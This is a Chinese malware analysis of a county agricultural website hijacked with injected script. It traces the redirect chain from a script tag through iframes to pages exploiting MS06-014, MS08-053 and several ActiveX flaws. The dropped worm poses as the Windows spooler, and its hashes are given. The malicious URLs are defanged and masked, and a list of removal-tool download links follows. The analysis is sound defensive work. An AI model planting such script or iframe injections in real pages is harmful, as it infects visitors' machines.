某县农业信息网挂马 Worm.Win32.AutoRun.umf
网站首页包含代码:
/---
<script src=hxxp://w**.9*4sa**om*m*.com/js.js></script>
---/
#1 hxxp://w**.9*4sa**om*m*.com/js.js
输出代码:
/---
<iframe src=hxxp://w**.c**6*6f**.cn/swf.htm width=100 height=0></iframe>
---/
#1.1 hxxp://w**.c**6*6f**.cn/swf.htm
检测浏览器类型,如果是IE内核,则此显示ie.swf,否则显示ff.swf,并输出代码:
/---
<iframe src=x.htm width=60 height=0></iframe>
---/
#1.1.1 hxxp://w**.c**6*6f**.cn/ie.swf
#1.1.2 hxxp://w**.c**6*6f**.cn/ff.swf
#1.1.3 hxxp://w**.c**6*6f**.cn/x.htm
引入以下网页:
#1.1.3.1 hxxp://w**.c**6*6f**.cn/1.htm
利用ms-06014漏洞下载 hxxp://d**.w**uc**7*.com/xx.exe
文件说明符 : d:/test/d**.w**uc**7*.com
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)
说明 : Spooler SubSystem App
版权 : ?MicRoSoFt Corporation. All rights reserved.
产品版本 : 5.1.2600.2696
产品名称 : MicrOSoFt?Windows?Operating System
公司名称 : Microsoft Corporation
内部名称 : spoo1sv.exe
源文件名 : spoo1sv.exe
创建时间 : 2008-12-15 12:33:22
修改时间 : 2008-12-15 12:33:24
大小 : 13312 字节 13.0 KB
MD5 : bffd930ac3d96e4e21b0d26d8cad02c3
SHA1: 97F2F1CF425FEEEB22833FB44549BBD74E23927D
CRC32: 43af59c4
卡巴斯基报为:Worm.Win32.AutoRun.umf[KLAN-18444490],瑞星报为:Worm.Win32.DownLoad.lz(http://bbs.ikaka.com/showtopic-8574655.aspx)
#1.1.3.2 hxxp://w**.c**6*6f**.cn/0.htm
利用MS08-053(Windows Media Encoder wmex.dll ActiveX BOF Exploit,clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C)漏洞
#1.1.3.3 hxxp://w**.c**6*6f**.cn/newlz.htm
利用联众软件(GLIEDown.IEDown.1)漏洞
#1.1.3.4 hxxp://w**.c**6*6f**.cn/s.htm
利用新浪DLoader Class ActiveX控件(Downloader.DLoader.1)漏洞
#1.1.3.5 hxxp://w**.c**6*6f**.cn/office.htm
利用MS08-041(snpvw.Snapshot Viewer Control.1)漏洞
#1.1.3.6 hxxp://w**.c**6*6f**.cn/2.htm
利用联众世界GLWorld ((HanGamePluginCn18.HanGamePluginCn18.1)漏洞
#1.1.3.7 hxxp://w**.c**6*6f**.cn/3.htm
当(IERPCtl.IERPCtl.1)版本小于或等于6.0.14.552时利用RealPlayer漏洞
#1.1.3.8 hxxp://w**.c**6*6f**.cn/4.htm
当(IERPCtl.IERPCtl.1)版本大于6.0.14.552时利用RealPlayer漏洞
#1.1.3.9 hxxp://w**.c**6*6f**.cn/5.htm
利用IE7漏洞
#1.1.3.10 hxxp://w**.c**6*6f**.cn/uu.htm
利用UUSee(clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B)漏洞
分享到:
相关推荐
手动移除方法 ...1、删除如下注册表项: ...<X>:\autorun.inf <X>:\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\<rnd>.vmx rnd是一个随机小写符号的字符串; X是磁盘。 安装系统的补丁: ...
Net-Worm.Win32.Kido 专杀
delphi Email-Worm.Win32.Canbis
病毒Net-Worm.Win32.Kido.ih 清除方法
Win32/Conficker.AA ,也被称为W32/Worm.AHGV , Win32.Worm.Downadup ,净Worm.Win32.Kido.bg ,蠕虫: Win32/Conficker , W32/Conficker.worm.gen ,并末/ Conficker ,是一种恶意蠕虫病毒传播的电脑在当地的网络...
微软网站上不去 说明中毒了,可以用此工具杀一下
Worm.WhBoy
Worm.Win32.Relop I-Worm.Lentin.a,b,c,d,e,f,g I-Worm.Tanatos Worm.Win32.Opasoft.a,b,c,d I-Worm.Klez.a,e,f,g,h Win32.Elkern.c 程序先扫描内存,然后再扫描指定的路径。 若发现内存或...
著名的bat.worm.muma,保存为txt格式
engine-worm.c
RECYCLER.exe变种,GHOST.PIF变种,KPE.exe(EKS.exe) Trojan.DL.VB.nua,services.exe变种,sysauto.exe变种,myserver变种,pegefile.pif(Trojan.PSW.Win32.Agent.mk), autorun.exe (Worm.Win32.Agent.h)等
zoj 2499 The Happy Worm.md
保护U盘不被AutoRun文件给虐了。。。
Worm.Nimaya(熊猫烧香) 专杀工具最新版本:1.10
手机中毒后解决方法,我碰到中毒后,就是使用这个访求解决的。不知对你是否有帮助。
卡巴斯基黑名单验证助手;帮助你了解当前KEY是否已经被列入黑名单
微软推出的有关冲击波(Worm.Msblast)病毒的安全补丁程序,适用于WindowsXP。
文件夹图标病毒专杀工具FolderCure更新到:V4.7Bulid20091001-1 Foldcure增加AI_Boy所破坏的文件夹与注册表的修复....MS32DLL.dll.exe..VBs Worm.Script.VBS.Autorun.a;svrhost.exe Backdoor.Win32.Gpigeon.dks等等
近期U盘病毒再次频繁活动,特别是名为"Worm.Win32.AutoRun.bqn"的Auto变种病毒,一旦中毒,它会迅速传播整个电脑,表现为隐藏所有文件夹,并复制同名病毒文件!建议大家做好防御措施!一点心得供大家分享!
morris worm source code